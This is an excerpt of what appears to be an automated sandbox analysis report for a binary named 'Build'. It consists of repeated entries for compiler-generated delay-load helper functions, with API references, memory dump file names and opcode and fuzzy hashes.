Instruction Fuzzy Hash: 05B012CA35D602AC325471995D96D3F010CC0C0B15331CD3FF509C0641E86C5C6D423F

Function 0044075F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4fce53fc341af008c2031720692bbb0d219c22797467e832d0b41ec5b03f3357
Instruction ID: b67af1e08afdcca025632f0ca199569d63b2b4828df406057a4046487891a891
Opcode Fuzzy Hash: 4fce53fc341af008c2031720692bbb0d219c22797467e832d0b41ec5b03f3357
Instruction Fuzzy Hash: 9FB012D636D402AC3114B1995E16D3F018CC0C0B15331CC3FFA09C0541D86C5C2E013F

Function 0044070F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 464e4475c3527268a1508eea9bdf124ea2b7fc1b7cdadeeea12ee6c66dd29b5f
Instruction ID: 9cccbb85e64982e659f5437856998a76b36e4abdddbdde073a4acf332b7f1549
Opcode Fuzzy Hash: 464e4475c3527268a1508eea9bdf124ea2b7fc1b7cdadeeea12ee6c66dd29b5f
Instruction Fuzzy Hash: 47B012D639D402AC311471995E16D3F010CC0C0B15331CC3FF909C0541D86C5D2E013F

Function 00440719 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 555a75b3c7645915c258490c292fa3be260f3caa287681091d417f5a7bd4be77
Instruction ID: 7bb581c986bb459d520256e134137e1ec5fe814823837f5e7b3b20f15f2f27bd
Opcode Fuzzy Hash: 555a75b3c7645915c258490c292fa3be260f3caa287681091d417f5a7bd4be77
Instruction Fuzzy Hash: 46B09296299402AC3114619A591693E0108D0C0B15331882BF509C0541986C5C29013B

Function 0044072D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 78e75c7b50b2ab4cb4321ccc82dd2378abfbdf6751c345fad7dc4e263573fb41
Instruction ID: d525c8c27a68c4b733accbdfebb6a897a48597b9e7da962ba3f5bd8192d916b2
Opcode Fuzzy Hash: 78e75c7b50b2ab4cb4321ccc82dd2378abfbdf6751c345fad7dc4e263573fb41
Instruction Fuzzy Hash: 92B0929625A502AC32546299591693E0108C0C0B15331892BF509C0541986C5C69023B

Function 004408C4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004408A7

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9d448a4801fa42350e7e2ad20f8860580346407b99af8d1316726e3a1b3bf0a1
Instruction ID: ac9d30445b9f2bd9345f74484ae4c46d97c00d66a47bc1aed8432b1c5155c2bf
Opcode Fuzzy Hash: 9d448a4801fa42350e7e2ad20f8860580346407b99af8d1316726e3a1b3bf0a1
Instruction Fuzzy Hash: 06B012C236C300AC320871495D92D3E020CC0C0B15330C92FF508C0183E86C5C9D613F

Function 004408CE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004408A7

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3010e293ae9f1e7521ce4bbdf1a1afab5933e3a3782b32b4ebb75f81d0e1ba07
Instruction ID: ddba854c14ed4bb3075c9d6167e52a18469566dfe1b1f97d2207f3e80af05251
Opcode Fuzzy Hash: 3010e293ae9f1e7521ce4bbdf1a1afab5933e3a3782b32b4ebb75f81d0e1ba07
Instruction Fuzzy Hash: 04B012C23AC200AC310871495D52E3E020CD0C0B15330C82FF508C0143D86C5C5D123F

Function 004408F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004408A7

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 686cc9d447d06aebe5744d4262c58b4a572fe29f44bc99e8625b51473a090b91
Instruction ID: 5519dc1d581540b105e9336eafd469ead192344a0fd02175cf643bb112406ff3
Opcode Fuzzy Hash: 686cc9d447d06aebe5744d4262c58b4a572fe29f44bc99e8625b51473a090b91
Instruction Fuzzy Hash: 8CB012C237C000AC310872499D02E3E020CD0C0B15330CA2FF508C0043D96C5C5D113F

Function 004409EA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004409FC

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a1b7fde2fdbbe28e86ebc73674d6b9eb77898bc5838df1273ad5744b948b3ae0
Instruction ID: 0a1bae0104be805037ecab2a25ace5989f826cffcaf997aa9e3d8f261adedcbb
Opcode Fuzzy Hash: a1b7fde2fdbbe28e86ebc73674d6b9eb77898bc5838df1273ad5744b948b3ae0
Instruction Fuzzy Hash: 3DB092C6398001AC71046149A912C3A0108C880B19730C92BF600C4042987D685A013A

Function 00440A70 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00440A5D

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 239d88f39439da0710fbef79ba1129cdfd97d225ad292d12549a4517d2a661f0
Instruction ID: 931177fb1b51b9aa7ce4d90622e2ca0f8e1549b3fb1cc64d4dd3517d51e49f35
Opcode Fuzzy Hash: 239d88f39439da0710fbef79ba1129cdfd97d225ad292d12549a4517d2a661f0
Instruction Fuzzy Hash: 99B012C13AC100EC320571999D26E3B014CD0C0B15330C83FF904C0182D86DAC1F013F

Function 00440A05 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004409FC

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: abc10ab375a8b353dd8907bb16a2d52e7b67b60f5bafc31bc7f1f6a25fd382c7
Instruction ID: 261a15b041d6c6f56e1c41d4ce307f6769736853c9bf32890c3271fc16e8d36d
Opcode Fuzzy Hash: abc10ab375a8b353dd8907bb16a2d52e7b67b60f5bafc31bc7f1f6a25fd382c7
Instruction Fuzzy Hash: 38B012C139C100EC7205B159AC12E3A010CC0C0B15330CA3FF604C0183D87D6C5D123F

Function 00440A0F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004409FC

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 939e20cb1eb9354573f883893d7f707a6157facbe1b88fb7ee499b2554e4c7e6
Instruction ID: ce360d6b96d78fcb51c2fa106c1ffa925735e5187b4142d34cfd353d2aaaec26
Opcode Fuzzy Hash: 939e20cb1eb9354573f883893d7f707a6157facbe1b88fb7ee499b2554e4c7e6
Instruction Fuzzy Hash: 06B092C13A8000AC7105A159A912E3A0108C080B15330C93BF604C4042986D681E023A

Function 00440A23 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004409FC

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 76612c94e880eb2f0bd9b640cb6eb896492e38e844209138225dbf1f6859ba3f
Instruction ID: 1179378f63235585e9abfd60878410fed65020315171ff996598ec8b40815dd6
Opcode Fuzzy Hash: 76612c94e880eb2f0bd9b640cb6eb896492e38e844209138225dbf1f6859ba3f
Instruction Fuzzy Hash: E1B012C139C000EC7104B149AC12D3B011CC0C0B15330C93FF904C1046D87C6C1D123F

Function 00440A84 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00440A5D

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 523fda4c77e19d7f10bb05af1e221dd8fb54d43f5acf572e239b3b6266555307
Instruction ID: caf73f8021ae4ce7e7e48a65a5eef4ca9d65787c08c917e5966e8aaa1ab5bbe1
Opcode Fuzzy Hash: 523fda4c77e19d7f10bb05af1e221dd8fb54d43f5acf572e239b3b6266555307
Instruction Fuzzy Hash: C4B012C13AC200FC334471999C26D3A014CD0C0B15330C92FF504C0181D87CAC5E123F

Function 00440A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00440A5D

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 132688c47ee49f713e2aa7ec0557d5c977011e68bf9d8ea300e4953c86e97510
Instruction ID: 4c177654b4b45971b0860b67cf7739cc8917b2e22fdcec495e217e47f9d85918
Opcode Fuzzy Hash: 132688c47ee49f713e2aa7ec0557d5c977011e68bf9d8ea300e4953c86e97510
Instruction Fuzzy Hash: 40B012C139C100FC320471999C26D3A014CD0C0B15330C82FF904C1181D87CAC1E113F

Function 004406C4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2a1f72197309447e190c43bff0a5417d87b44b50b77603ab62995cdb1eee32f3
Instruction ID: 2cbf837bb244e5dfda0ad1b93fe8dc4cefe79977179e1487ff13d8a335f18deb
Opcode Fuzzy Hash: 2a1f72197309447e190c43bff0a5417d87b44b50b77603ab62995cdb1eee32f3
Instruction Fuzzy Hash: 66A002D6659543BC311561955D16D3F011CD4C4B553318D2FF506C4441586C1C6D503B

Function 00440746 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 21e7a033709c798feaf25486e8a84d660c70e2e89a792a80115d371ed97bf5d8
Instruction ID: 2cbf837bb244e5dfda0ad1b93fe8dc4cefe79977179e1487ff13d8a335f18deb
Opcode Fuzzy Hash: 21e7a033709c798feaf25486e8a84d660c70e2e89a792a80115d371ed97bf5d8
Instruction Fuzzy Hash: 66A002D6659543BC311561955D16D3F011CD4C4B553318D2FF506C4441586C1C6D503B

Function 00440750 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

